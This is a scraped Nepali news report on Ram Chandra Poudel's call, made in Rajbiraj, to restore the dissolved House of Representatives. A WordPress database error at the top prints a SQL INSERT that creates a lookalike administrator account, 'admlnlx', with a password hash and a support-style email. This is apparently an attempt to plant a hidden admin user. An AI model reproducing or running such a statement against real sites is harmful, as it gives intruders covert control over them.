WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWE89CInVNcYYnq2Q5ir3U605r5eAF0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:16:12', '', 'admlnlx', 'admlnlx')
राजाबिराज । नेपाली कांग्रेसका वरिष्ठ नेता रामचन्द्र पौडेलले प्रतिनिधिसभाको पुनस्र्थापना हुनुपर्ने बताउनुभएको छ । नेपाल प्रेस युनियन सप्तरीले आज राजविराजमा आयोजना गरेको पत्रकार सम्मेलनमा उहाँले देशलाई दुर्घटना हुनबाट जोगाउन प्रतिनिधिसभा तत्काल पुनस्र्थापना हुनुपर्नेमा जोड दिए ।
मधेश यात्रामा निस्किनुभएका नेता पौडेलले विघटन गरिएको प्रतिनिधिसभाको विरोधमा कांग्रेसले पनि आन्दोलन गरिरहेको बताउँदै लोकतन्त्र र गणतन्त्र रक्षा गर्नका लागि प्रतिनिधिसभा पुनःस्थापना जरुरी रहेको दाबी गर्नुभयो । प्रतिनिधिसभा विघटनबारे संविधानको धारामा रहेर नै अदालतले फैसल गर्ने उहाँको विश्वास छ ।
“प्रतिनिधिसभा विघटनसम्बन्धी मुद्दामा अदालतले विचार गरिइरहेकाले कांग्रेसले अहिले ठूलो आन्दोलन नगरेको हो । भ्रममा नरहँदा हुन्छ”, उहाँले भन्नुभयो, “संविधानमा जे छ अदालतले पनि त्यही गर्छ, जतिसुकै सेटिङ गरे पनि अदालतले संविधानबाहिर गएर फैसला गर्न सक्दैन ।” नेता पौडेलले आन्दोलनमा मधेशका नेताहरूको ठूलो योगदान रहेको बताउँदै ती नेताहरूको सम्मान र ऐतिहासिक ठाउँहरूको भ्रमणका लागि आफू मधेश यात्रामा निस्केको जानकारी दिए । रासस